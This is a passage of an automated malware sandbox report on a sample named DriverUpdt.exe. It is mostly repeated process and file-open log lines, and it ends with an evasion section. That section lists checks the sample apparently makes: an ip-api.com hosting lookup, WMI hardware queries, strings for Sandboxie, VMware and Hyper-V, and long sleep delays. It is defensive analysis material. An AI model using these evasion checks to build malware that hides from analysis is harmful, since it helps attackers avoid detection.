                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\DriverUpdt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DriverUpdt Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\DriverUpdtProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                      Source: C:\Users\user\Desktop\DriverUpdt.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: DriverUpdt.exe, DriverUpdt.0.dr | Binary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\DriverUpdt.exe | Memory allocated: 1350000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DriverUpdt.exe | Memory allocated: 1AFE0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\DriverUpdt | Memory allocated: A10000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\DriverUpdt | Memory allocated: 1A570000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\DriverUpdt | Memory allocated: 1090000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\DriverUpdt | Memory allocated: 1AB30000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\DriverUpdt.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\DriverUpdt | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\DriverUpdt.exe | Window / User API: threadDelayed 9392
                      Source: C:\Users\user\Desktop\DriverUpdt.exe | Window / User API: threadDelayed 448
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5557
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4271
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7311
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2296
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6006
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3616
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6616
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3117
                      Source: C:\Users\user\Desktop\DriverUpdt.exe TID: 7080 | Thread sleep time: -8301034833169293s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3936 | Thread sleep time: -5534023222112862s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1680 | Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7044 | Thread sleep count: 6006 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7044 | Thread sleep count: 3616 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1076 | Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5228 | Thread sleep count: 6616 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2968 | Thread sleep count: 3117 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3836 | Thread sleep time: -5534023222112862s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\DriverUpdt TID: 5948 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 1964 | Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\DriverUpdt TID: 2576 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
                      Source: C:\Users\user\Desktop\DriverUpdt.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                      Source: C:\Users\user\Desktop\DriverUpdt.exe | File Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\DriverUpdt | File Volume queried: C:\ FullSizeInformation
                      Source: DriverUpdt.0.dr | Binary or memory string: vmware
                      Source: svchost.exe, 00000012.00000002.3277939813.000001BA75A54000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.3277339892.000001BA75A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.3273129280.000001BA7042B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
